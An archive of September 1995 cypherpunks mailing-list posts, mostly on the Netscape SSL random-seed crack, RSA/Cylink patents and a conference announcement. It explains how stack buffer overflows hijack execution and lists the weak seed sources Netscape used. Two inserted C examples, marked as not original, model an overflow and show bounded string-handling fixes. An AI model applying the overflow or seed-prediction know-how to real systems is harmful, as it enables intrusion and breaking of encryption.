Sun's mailtool.  I don't know that I've ever gotten mail with unknown 
Content-Type though...wait let me whip some up...

Mailtool assumes anything with a content type is an attachment.  The
type is used as the name of the attachment.  A Content-Type: of 
application/foo or of just foo both yield an attachment named foo.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Wed, 20 Sep 95 09:43:46 PDT
To: cypherpunks@toad.com
Subject: Re: NSA and Netscape Crack
Message-ID: <ac85fa9f010210046fb1@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 3:46 PM 9/19/95, Jim Ray wrote:
....
>I don't expect to know NSA's specific brute-force capability, but
>does anyone know if the NSA has *ever* found a glaring weakness in
>software and then told its author(s) or owner(s) about it? Do "we"
>perform the "COMSEC" role Tim was speaking of better than the NSA?
>JMR
....
Once upon a time NSA would find weaknesses in friends' crypto systems and
tell them about it -- depending, of course, on the situation. It was a
reciprocal practice. We don't know that NSA didn't tell Netscape.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 20 Sep 95 06:12:57 PDT
To: bsdc@ai.mit.edu
Subject: Conference: WORLDWIDE ELECTRONIC COMMERCE
Message-ID: <v02120d10ac85c201aa86@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Wed, 20 Sep 1995 06:03:04 +0059 (EDT)
From: Michael S Baum <baum@world.std.com>
Subject: Re: BSDC Update 1.2
To: Robert Hettinga <rah@shipwright.com>
Mime-Version: 1.0

Robert,

Can you please consider letting your Boston list (or other lists) know
about the following. Thanks.

----------------


ANNOUNCING:


The Second Annual . . .


        WORLDWIDE ELECTRONIC COMMERCE
        Law, Policy, Security &
        Controls Conference


   October 18-20, 1995
   At the Hyatt Regency Bethesda


   Phone: (214) 516-4900


The Second Annual WorldWide Electronic Commerce; Law, Policy,
Security and Controls conference is fast approaching. This
important event will feature the world's foremost experts
addressing the most important issues of implementation and
control related to secure electronic commerce. It will
focus on current problems and provide a foundation for dealing
with the emerging problems that promise to make the future
more complex. We have been fortunate in securing a faculty
that is unusually qualified and internationally recognized
who will share their experience, knowledge and theories on
the wide range of issues being addressed by this program.
We are equally pleased to have obtained affiliation for
this conference of a number of prestigious and influential
organizations.

Please join us and your colleagues at this unique event!

   Michael S. Baum, J.D., M.B.A. Conference Chair



Provided in Affiliation with:
=============================================
* American Bar Association
  Section of Science and Technology
  Information Security Committee

* University of London
  Queen Mary & Westfield College
  Centre for Commercial Law Studies

* EDI Association of the United Kingdom

* Harvard Law School

* International Union of Latin Notaries

* International Chamber of Commerce, Paris

* National Institute of Standards and Technology (NIST)

* Software Publishers Association

* United Nations
  Commission on International Trade Law (UNCITRAL)

* U.S. Council of International Business
=============================================


Keynote Speaker:
----------------
   Dr. Vinton G. Cerf, Ph.D.
   Senior Vice President
   MCI Telecommunications Corp.



CONFERENCE PROGRAM ...at a glance

  GENERAL SCHEDULE
  -------------------------------------------------
    Wednesday, October 19, 1995  6:00pm - 7:30pm
    SECURE ELECTRONIC COMMERCE FOR THE BEGINNER

    Thursday, October 20, 1995
      8:00am - 9:00am   Welcome & Keynote Speech
      9:00am - 5:50pm   Sessions 1 - 5

    Friday, October 21, 1995
      8:00am - 4:50pm   Sessions 6 - 10


----------------------------------------------
TRACK - A
AGREEMENTS, LEGISLATION, POLICY AND REGULATION
----------------------------------------------
Session 1
So Who's in Charge, Anyway?
The Impact of National & Int'l Leadership & Initiatives in Secure EC
   SPEAKERS:
     Harold S Burman, Esq., Office of the Legal Advisor
     Sally  Katzen, Office of Management and Budget
     Bruce  McConnell, Office of Management & Budget
     Renaud  Sorieul, Esq., UNCITRAL

Session 2
Drafting Agreements for Secure Electronic Commerce
   SPEAKERS:
     Michael S Baum, Esq., Independent Monitoring
     Thomas J Smedinghoff, Esq., McBride Baker & Coles
     Joe  Wackerman, Esq., United States Postal Service

Session 3
Are Privacy Requirements Inhibiting Electronic Commerce?
   SPEAKERS:
     Kenneth C Bass III, Esq., Venable, Baetjer, Howard & Civiletti
     Prof. George  Trubow, The John Marshall Law School
     Ian  Walden, Ph.D., Commission of the European Communities

Session 4
Alternative Methods of Signing:
Legal Aspects of the IRS's July 1995 Regulation
   SPEAKERS:
     Tom  Baker, Esq., Internal Revenue Service
     Lynn  Casimir, Esq., Internal Revenue Service
     Celia  Gabrysh, Esq., Internal Revenue Service

Session 5
Digital Signature Legislation and Electronic Commerce
   SPEAKERS:
     Alan  Asay, Esq., Utah Department of Commerce
     Kirk W Dillard, Esq., State Senator, State of Illinois
     Dean  Sutherland, State Senator, Washington State
     William E. Wyrough, Jr., J.D., M.B.A., Florida Legislature

Session 6
The Legal Status and Effect of Digital Signatures - Perspectives
   SPEAKERS:
     Prof. Mads  Andersen, University of Copenhagen
     Mario  Miccoli, International Union of Latin Notaries

Session 7
On-Line Registration vs. In-Person Registration:
What Satisfies Business and Legal Requirements?
   SPEAKERS:
     Phillip  Hallam-Baker, Massachusetts Institute of Technology
     Jeff  Treuhaft, Netscape Communications Corporation
     Peter  Williams, Verisign

Session 8
Antitrust in Electronic Commerce:
Shopping, Payments & Certification Authorities
   SPEAKERS:
     Prof. Mads  Andersen, University of Copenhagen
     John  Greanley, Esq., US Department of Justice, Antitrust Division

Session 9
Proving Secure Computer-Based Transactions: Evidence Revisited
   SPEAKERS:
     Margaret A Berger, Brooklyn Law School
     Charles  Nesson, Harvard Law School
     Ian  Walden, Ph.D., Commission of the European Communities

Session 10
Third Party Service Providers & Certification Authorities-Can They
Successfully Limit their Liability
   SPEAKERS:
     Bruce  Hunter, Esq., General Electric Information Services
     Ellen  Kirsh, Esq., America On Line
     Renaud  Sorieul, Esq., UNCITRAL

--------------------
TRACK - B
INFORMATION SECURITY
--------------------
Session 1
Requirements for Implementing Reasonable Security Procedures
   SPEAKERS:
     Robert  Daniels, Esq., U.S. Social Security Administration
     Dain  Gary, Morgan Stanley
     Allan M Shiffman, Terisa Systems, Inc.

Session 2
Information Security Standards: Policy, Coordination & Interoperability
   SPEAKERS:
     Marty  Ferris, US Department of Treasury
     Hoyt  Kesterson II, Bull Worldwide Information Systems
     Peter  Landrock, Ph.D., CRYPTOMATHIC
     David  Solo, Bolt, Beranek and Newman

Session 3
Who's Really on the Other End:
Identification Technologies and Nonrepudiation
   SPEAKERS:
     Benjamin  Miller, Personal Identification News
     John E Siedlarz, IriScan, Inc.
     William  Sweet, National Semiconductor

Session 4
Security and Security Policy in Internet-based Payments Systems
   SPEAKERS:
     Marty  Ferris, US Department of Treasury
     Tim  Jones, Mondex
     Anne  Wallace, US Department of Treasury

Session 5
When You Forget Your PIN or Die: Key Escrow in Secure Electronic Commerce
   SPEAKERS:
     Prof. Michael  Froomkin, University of Miami School of Law
     Jeff  Greiveldinger, US Department of Justice, Criminal Div.
     Frank W Sudia, Bankers Trust Company

Session 6
Comparing Critical Cryptographic Algorithms, Protocols,
and Standards to Enable Secure Electronic Commerce
   SPEAKERS:
     Peter  Landrock, Ph.D., CRYPTOMATHIC
     Ron  Rivest, Massachusetts Institute of Technology
     Miles E Smid, National Institute of Standards & Tech.

Session 7
Export Controls & Transborder Data Flows:
Is Secure Electronic Commerce in Jeopardy?
   SPEAKERS:
     James  Bidzos, RSA Data Security
     Renee H Danckwerth, Export Consultant


Session 8
'Certificates-R-US':
Trust Models and the Developing Secure Information Infrastructure
   SPEAKERS:
     Warwick  Ford, Bell-Northern Research
     Sead  Muftic, COST Computer Security Technologies
     Peter  Williams, Verisign

Session 9
Professional Accreditation and Certification -
The New Frontier in 'Remote Trust'
   SPEAKERS:
     Richard C Koenig, Int'l Info. Sys. Security Cert. Consort.
     Alan M Schwartz, Esq., American Bar Association

Session 10
Looking into the Crystal Ball: Certificates Revisited
   SPEAKERS:
     Web  Augustine, VeriSign, Inc.
     Warwick  Ford, Bell-Northern Research
     Hoyt  Kesterson II, Bull Worldwide Information Systems

-------------------------------------------
TRACK - C
LEGAL ASPECTS OF SECURE ELECTRONIC COMMERCE
-------------------------------------------
Session 1
Do Criminal Laws Really Protect Electronic Commerce?
   SPEAKERS:
     Scott  Charney, Esq., US Department of Justice
     William J Cook, Brinks, et al.
     Richard A Ress, Federal Bureau of Investigation

Session 2
Who Owns the Information, Standards, Certificates and Cryptographic Keys?
   SPEAKERS:
     Peter  Harter, National Public Telecomputing Network
     David W Maher, Esq., Sonnenschein Nath & Rosenthal
     James  Powers, Esq., Shulman, Rogers et. al

Session 3
Consumers on the Net - Fairness, Conspicuousness, Notice, and Reliance
   SPEAKERS:
     Nessa Eileen Feddis, Esq., Government Relations/Retail Banking
     Ray  Nimmer, Esq., Weil, Gotshal & Manges

Session 4
Electronic Licensing and Distribution of Digital Content:
Downloading for Liability?
   SPEAKERS:
     James C McKay, Jr., Office of the Corporation Counsel, D.C.
     Thomas J Smedinghoff, Esq., McBride Baker & Coles
     Mark  Traphagen, Software Publishers Association.

Session 5
Insuring Electronic Commerce Transactions and Infrastructure
   SPEAKERS:
     Andrew  Cockrane, Alexander & Alexander
     Norman R Nelson, New York Clearing House Association

Session 6
Auditing a Third Party/Value Added Network or
Certification Authority (and Its Implications)
   SPEAKERS:
     Charles H LeGrand, CIA, Institute of Internal Auditors
     John  Stelzer, COMMERCE:Institute

Session 7
Electronic Recordkeeping -
What to Save, When and How to Save It, and for How Long
   SPEAKERS:
     Lynn  Casimir, Esq., Internal Revenue Service
     Celia  Gabrysh, Esq., Internal Revenue Service
     Claude  Perreault, Chambre des notaires du Quebec

Session 8
Disaster and Contingency Planning Services: What is Needed for EC and
Certification Authorities
   SPEAKERS:
     Dain Gary, Morgan Stanley
     Ake Nilson, Marinade Limited
     Helena  Roine-Taylor, The Finnish Data Communication Assoc. FINPRO
     David Solo, Bolt, Beranek and Newman

Session 9
General Counsel's Forum on Computer-Based Trade
   SPEAKERS:
     Robert W Barger, Esq., AT&T
     Bruce  Hunter, Esq., General Electric Information Services
     Ellen  Kirsh, Esq., America On Line

Session 10
An Audit Model for Your Electronic Commerce Infrastructure
   SPEAKERS:
     Gerald R Bielfeldt, NationsBank
     Phillip  Oddo, Ciba-Geigy
     Horton  Sorkin, Ph.D., Howard University


------------------------------
TRACK - D
INFRASTRUCTURAL CONSIDERATIONS
------------------------------
Session 1
Securely Shopping on the Web: New Paradigms, Protocols and Opportunities
   SPEAKERS:
     Jeff Hilt, VISA International
     Todd Ostrander, Egghead Software

Session 2
What can Trusted Third Parties and Certification
Authorities Learn from the Financial Clearinghouses
   SPEAKERS:
     Carol  Barrett, Federal Reserve Bank of New York
     Bill  Nelson, National Automated Clearinghouse Associa
     Norman R Nelson, New York Clearing House Association

Session 3
Electronically 'Gluing' Computer-based Records
   SPEAKERS:
     Phillip  Hallam-Baker, Massachusetts Institute of Technology
     Allan M Shiffman, Terisa Systems, Inc.

Session 4
Global Registries for Secure Electronic Commerce
   SPEAKERS:
     Jonathan Allen, Barum Computer Consultants
     Michel Peereman, Federation Nationale des Chambres
     Peter Robinson, US Council for International Business

Session 5
Computer-based Negotiability: What is Needed to Make it Work
   SPEAKERS:
     Harold S Burman, Esq., Office of the Legal Advisor
     James E Byrne, James Mason University Law School
     Ake Nilson, Marinade Limited

Session 6
Time/Date Stamping of Digital Information: Necessities & Options
   SPEAKERS:
     Richard  Rothwell, United States Postal Service
     Scott  Stornetta, Surety Technologies, Inc.

Session 7
Will Healthcare-related Electronic Commerce
Require Special Controls and Secure Infrastructures?
   SPEAKERS:
     Kathleen  Frawley, J.D., M.S., R.R.A, AHIMA
     Daniel J O'Shea, National Computer Claims Service

Session 8
The Role of Notaries in Securing Computer-Based Commerce: the CyberNotary(sm)
   SPEAKERS:
     Theodore S Barassi, Esq., US Council for International Business
     Mario Miccoli, International Union of Latin Notaries

Session 9
Electronic Cash and Novel Electronic Commerce Payments Systems
   SPEAKERS:
     Nessa Eileen Feddis, Esq., Government Relations/Retail Banking
     Ron Rivest, Massachusetts Institute of Technology
     Marvin Sirbu, Carnegie-Mellon University

Session 10
Why does Everyone Want to be a Trusted Third
Party/Certification Authority (at Least Initially)?
   SPEAKERS:
     Sead  Muftic, COST Computer Security Technologies
     Stratton D Sclavos, VeriSign, Inc.


-----------------------------------------------------------------
TO REGISTER:
-------------

Price: $550.00 (U.S.)

Name:
Title:
First Name for Badge:
Company/Organization:
Address:
City/State/Prov/Zip/Postal code:
Country:
Telephone:
Fax:
E-Mail:

Check One:
==========
[ ] I am Mailing a check in the amount of $______
[ ] I wish to charge this to a credit card (fax or mail only)
     [ ] American Express
     [ ] Visa
     [ ] MasterCard

     Card Number:
     Expiration Date:
     Name on Card:
     Signature (fax or mail):

-----------------------------------------------------------------
HOTEL RESERVATIONS:
        A special conference rate of $129 has been arranged
        for our attendees. To make arrangements, please call
        the Hyatt Regency Bethesda at (301) 657-1234

        Hyatt Regency Bethesda
        One Bethesda Metro Center
        Bethesda, MD 20814
-----------------------------------------------------------------

For more information or a complete program brochure and schedule,
contact the conference coordinators as shown below:


HOW TO CONTACT US
=================
E-Mail:  wec@multicorp.com
Phone: (214) 516-4900
Fax: (214) 424-0562

Mail: Worldwide Electronic Commerce
      PO Box 743485
      Dallas, TX 75374

===============================================
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Wed, 20 Sep 95 06:16:09 PDT
To: cypherpunks@toad.com
Subject: `Random' seed.
Message-ID: <9509200915.ZM14792@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



Vaporware which I heard around CFP '95, and have been sort of wondering about
ever since...

Some one told me that some one else [possibly Matt Blaze] had been looking
at how much randomness could be got by forking two child processes which
would just run as asynchronous clocks: whenever the parent program needs a
little `random' bit, it queries both and gives (clock(A) + clock(B) % 2)
or something.

Questions about this [to the list]:
 * who has done any [the?] work on this?
 * was it found to be useful/good or not?
 * what would be the drawbacks to adding this [Yet Another Source Of Entropy]
   to the Netscape scheme?

frodo =)

-- 
Richard Martin 
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 06:29:32 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Cylink
In-Reply-To: <9509192145.AA01100@ch1d157nwk>
Message-ID: <199509201328.JAA04874@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Loewenstern writes:
> >  The arbitrators ruled that RSA hasn't had the right to sublicense
> >  the Stanford patents since 1990.
> >
> >  Cylink said it would seek royalties from companies that have licensed
> >  software code from RSA and are redistributing it, arguing that they
> >  are infringing the Stanford patents.
> 
> hahahaha, this is funny if it's true...  Anyone know which two patents they  
> are referring to? (diffie-hellman and merkle-hellman?)
> 
> Any ideas on how this will change the legal status of RSAREF and PGP?

I'm much more interested in how this changes the legal status of the
D-H derived encryption systems like ElGamal, and how it alters the
patent status on the DSS, which is basically also derived from the
same root.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Wed, 20 Sep 95 09:44:11 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509201630.JAA01430@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


I talked to somebody from RSA yesterday, and she said that they
issued a press release yesterday that she expected to see in the
papers today (I didn't see it) and would be on their web site
"soon" that would explain their position.  They say that the
arbitration agreement maintains the status quo pretty much,
and while it doesn't limit what RSA can do, it severely limits
what Cylink can do.

I think that what RSA needs to do is hire Cylink's PR agency...

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 07:05:47 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509200403.AAA14189@clark.net>
Message-ID: <199509201405.KAA04961@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
> > > 
> > >   Sigh.  For your information the security code for 1.x versions of
> > > netscape was not even written by someone from NCSA.
> > 
> > If there is ANY place in the code that I can do a data driven buffer
> > overflow, I can force you to execute code that I supply. I don't give
> > a damn if it's in the "security" code. It makes no difference where it
> > is. If there is a chink, that's it -- you're meat.
> 
>   How would you do this if the buffer overflow happened in a buffer
> which was allocated in a separate protected heap apart from stack
> and executable data?

You could do that, but that's not how C does things. C allocates these
things on the stack. Overflow the buffer and you fandango on stack,
allowing you to change where the program counter jumps to on
subroutine exit, and allowing you to force your own machine code into
the system for execution.

I suspect that even were subroutine data allocated in a separate heap
you could pull nasty tricks -- your protected heap probably has data
in it that controls execution flow, so cleverness might still get you
the same results.

Perry
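[Added example, not part of Perry Metzger's message and not Netscape code: a C model of the layout described above, with a local buffer sitting next to the word that decides where execution resumes, showing an unchecked copy beside a length-checked one. The struct layout, the constants and the canary check (a mitigation the thread does not mention) are assumptions constructed for illustration; real frames are compiler- and ABI-specific.]

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 16
#define CANARY  ((uintptr_t)0x5AFEC0DEu)  /* constructed guard value */

/* Model of one stack frame. The same picture applies to a heap object
 * that keeps a function pointer or allocator metadata after a buffer. */
struct frame {
    unsigned char buf[BUF_LEN];  /* local array filled from input */
    uintptr_t canary;            /* guard word checked before "return" */
    uintptr_t saved_ret;         /* where execution resumes on exit */
};

void frame_init(struct frame *f, uintptr_t ret)
{
    memset(f->buf, 0, sizeof f->buf);
    f->canary = CANARY;
    f->saved_ret = ret;
}

/* Models a copy with no length check: bytes past BUF_LEN land in the
 * fields that follow buf. The cap at sizeof *f exists only so that this
 * model stays well-defined C; a real overflow has no such cap. */
void copy_unchecked(struct frame *f, const unsigned char *in, size_t n)
{
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy((unsigned char *)f, in, n);
}

/* Hardened form: refuse input that does not fit the buffer. */
int copy_checked(struct frame *f, const unsigned char *in, size_t n)
{
    if (n > sizeof f->buf)
        return -1;
    memcpy(f->buf, in, n);
    return 0;
}

/* Detection: a changed guard word means the fields after buf were
 * written, so the saved return value must not be trusted. */
int frame_intact(const struct frame *f)
{
    return f->canary == CANARY;
}

int main(void)
{
    struct frame f;
    unsigned char input[sizeof(struct frame)];  /* constructed oversized input */
    memset(input, 0x41, sizeof input);

    frame_init(&f, (uintptr_t)0x1000);
    copy_unchecked(&f, input, sizeof input);
    printf("unchecked: saved_ret=%#lx intact=%d\n",
           (unsigned long)f.saved_ret, frame_intact(&f));

    frame_init(&f, (uintptr_t)0x1000);
    int rc = copy_checked(&f, input, sizeof input);
    printf("checked:   rc=%d saved_ret=%#lx intact=%d\n",
           rc, (unsigned long)f.saved_ret, frame_intact(&f));
    return 0;
}
```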




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 10:11:43 PDT
To: kinney@bogart.Colorado.EDU (W. Kinney)
Subject: Re: My Day
In-Reply-To: <199509201648.KAA11790@bogart.Colorado.EDU>
Message-ID: <199509201706.KAA02759@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> I've put my code up on the cypherpunks ftp site, but I'm still waiting to
> hear back from the site maintainers as to its final location. In any case,
> that code uses the mouse _position_ and system timings in microseconds as
> input to the MD5 engine. So swirling the mouse should provide a good source
> of random input, better the faster it's moved. 
> 
	Did you send mail to cypherpunks-ftp@csua.berkeley.edu ?

/pub/cypherpunks/randomness

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Wed, 20 Sep 95 10:08:44 PDT
To: cypherpunks@toad.com
Subject: Hypermail gateway
Message-ID: <199509201708.KAA00091@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Yesterday, I started a new hypermail gateway at:

      http://kiwi.cs.berkeley.edu/~cpunks/

   Please try not to overload the site; it's a research machine.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 20 Sep 95 10:09:50 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Please send me SSL problems...
Message-ID: <v02110108ac85f664b498@[204.179.132.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:22 9/20/95, Rich Salz wrote:
>> Jeff, the SSL specification has a severe *architectural* problem - it
>> assumes that Internet Protocols are APIs ...
>>  The IETF quite explicitly doesn't care about APIs
>
>With one exception so important that it might blow away your whole
>complaint...
>
>...GSSAPI.
>        /r$

And we see how far *that* effort has gotten...

There was some discussion in Toronto last summer about APIs for the basic
transports (i.e. standardizing "sockets", or TLI, or whatever), which got
backed off to a list of "required service elements" that a good stack
vendor should make available to the app programmers, and then the whole
notion got killed off for the reasons I cited.

GSSAPI was an attempt to make it easy to slide in authentication &
encryption into existing software - lay a foundation for real security in
the applications. A fine goal, but a bad plan for achieving the goal. I
think they were also trying to avoid blessing any particular crypto scheme,
to avoid both the export morass, and the patent morass - "we'll drop in
whatever we can get on good terms, later."

API and interface standards are to be avoided in part because of the
reasons I cited previously, in part because they're hard to do right for
all platforms (not everyone uses function-call style system/library calls),
and in part because they do not guarantee you interoperability - classic
case in point is the Microsoft Mail API (MAPI): you can put *anything*
under MAPI: Novell MHS, cc:Mail, QuickMail, or SMTP, just to name a few. If
you are not speaking the same wire protocol as your intended correspondent
(or peer), you lose, regardless of the fact that your software and hers are
both using the same API - you cannot interoperate.

What really annoys me is the fuss you see in the trade rags about
"middleware" these days; they've missed this entire point about interfaces
versus protocols, and they're propagating the misconception that interfaces
give interoperability to the general marketplace. And the vendors are
laughing all the way to the bank.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 20 Sep 95 08:28:30 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Press release
Message-ID: <v01510106ac85ee814baa@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

We've seen the word "hacker" kicked around rather arbitrarily in the press.
Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
time for some cypherpunks spin. How about a logo *and* a press release? The
press release would give contacts (email, phone, etc.) so that someone on
this list would be contacted by journalists when a crypto story breaks.

If we get enough volunteers, we can fax blanket every newspaper, station,
and network in the world.


Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 07:37:07 PDT
To: "Jeff Weinstein" <jsw@netscape.com>
Subject: Re: netscape's response
In-Reply-To: <9509200254.ZM206@tofuhut>
Message-ID: <199509201436.KAA05021@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Jeff Weinstein" writes:
>   It turns out that Taher Elgamal and I started working here within
> a week of each other, about 6 months ago.  Neither of us thought to
> take a serious look at the RNG seed code.  I don't think that anyone
> would accuse Taher of being an amateur in this area.

Well, he is more of a math guy than a practical guy.

For a long time, I've posted articles and have seen other people post
articles arguing that the right place to attack systems like this is
in spots like the random number generators.

Were I Netscape, I'd be conducting code reviews for lots of other
things, too.

Your coding standards should out and out ban the use, anywhere in your
code, of sprintf, gets, strcat, or any other thing that manipulates
strings without explicitly taking length limits. system and any
similar calls should also be banned entirely. It doesn't matter if you
"think" they are safe -- calls you don't use can't be somehow trickily
abused.

I suspect, however, that the seductiveness of "oh, this looks safe
enough" will probably continue to win out with your colleagues over
systematic approaches to these problems. After all, they never seemed
to learn the lesson in revision after revision of NCSA's stuff.

This is not to say that I think *you* are bad at this, Mr. Weinstein,
but you certainly have colleagues with the worst possible track record.

Perry
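
[Added example, not part of Perry Metzger's message and not Netscape or NCSA code.] The unbounded sprintf/strcat pattern that the message asks to ban, beside length-limited replacements for sprintf, strcat and gets that treat truncation as an error; it also covers the stack-buffer overflow he describes in his reply to Ray Cromwell above. All function names are hypothetical.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* BEFORE: the pattern the message asks to ban. The size of `out` never
 * enters either call, so a long host or path writes past the end of the
 * caller's buffer. Kept for contrast; nothing below calls it. */
void build_url_unbounded(char *out, const char *host, const char *path)
{
    sprintf(out, "http://%s", host);
    strcat(out, path);
}

/* AFTER (sprintf): the caller states the destination size, and a result
 * that does not fit is an error, not a silently shortened string.
 * Returns 0 on success, -1 on bad arguments or truncation (out = ""). */
int build_url_bounded(char *out, size_t outsz,
                      const char *host, const char *path)
{
    int n;

    if (out == NULL || outsz == 0 || host == NULL || path == NULL)
        return -1;
    n = snprintf(out, outsz, "http://%s%s", host, path);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* AFTER (strcat): append only if the whole of src fits, else leave dst
 * untouched. Returns 0 on success, -1 otherwise. */
int append_bounded(char *dst, size_t dstsz, const char *src)
{
    const char *end;
    size_t used, need;

    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    end = memchr(dst, '\0', dstsz);
    if (end == NULL)                 /* dst is not terminated in bounds */
        return -1;
    used = (size_t)(end - dst);
    need = strlen(src);
    if (need >= dstsz - used)        /* no room for src plus the NUL */
        return -1;
    memcpy(dst + used, src, need + 1);
    return 0;
}

/* AFTER (gets): read one line into a sized buffer.
 * Returns 0 with the newline stripped, 1 at end of input, and -1 if the
 * line was too long; the rest of that line is discarded so the next call
 * starts on a fresh line instead of seeing its tail as input. */
int read_line(FILE *fp, char *buf, size_t bufsz)
{
    size_t len;
    int c;

    if (fp == NULL || buf == NULL || bufsz < 2 || bufsz > INT_MAX)
        return -1;
    if (fgets(buf, (int)bufsz, fp) == NULL)
        return 1;
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    c = getc(fp);
    if (c == EOF || c == '\n')       /* line fit exactly, or last line */
        return 0;
    while ((c = getc(fp)) != EOF && c != '\n')
        ;
    buf[0] = '\0';
    return -1;
}

int main(void)
{
    char url[32];

    if (build_url_bounded(url, sizeof url, "example.org", "/index.html") == 0)
        puts(url);
    if (build_url_bounded(url, sizeof url,
                          "a-host-name-longer-than-the-buffer.example", "/") != 0)
        puts("rejected: would not fit");
    return 0;
}
```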




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 03:38:58 PDT
To: cypherpunks@toad.com
Subject: Re: My Day
In-Reply-To: <43o44t$hof@calum.csclub.uwaterloo.ca>
Message-ID: <43oquc$70f@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <43o44t$hof@calum.csclub.uwaterloo.ca>, iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg) writes:
[ summary of Ian's day deleted ]

  Now imagine what my last 48 hours have been like.  :-)

> Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif ) was kind enough to
> verify that the SunOS 4.1.3 version of Netscape generates its keys in
> _exactly_ the same way as Solaris and HP-UX; he says he'll test other
> architectures tomorrow.  I suspect any big-endian machine with the
> lrand48() function (which is used in key generation on Solaris/HP-UX;
> it's disguised in unssl.c as the macro mklcpr()) will be the same.
> Other Unix flavours should require only minor changes.

  Most of the unix machines do the same thing.  On SGI machines
that have the hardware cycle counter, its value is used in place of the
srand48(usec), lrand48() sequence.  On BSDI the code used srandom and random.

> I'm still interested in what Windoze clients do (other than lose).

  On windows and mac the first 32-bit seed is seconds since 1970, and the
second 32-bit seed is the "tick count", which I'm told is the number of
milliseconds since windows started.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arve Kjoelen <akjoele@shiva.ee.siue.edu>
Date: Wed, 20 Sep 95 08:38:52 PDT
To: cypherpunks@toad.com
Subject: drand48() bug
Message-ID: <199509201538.KAA28316@shiva.ee.siue.edu>
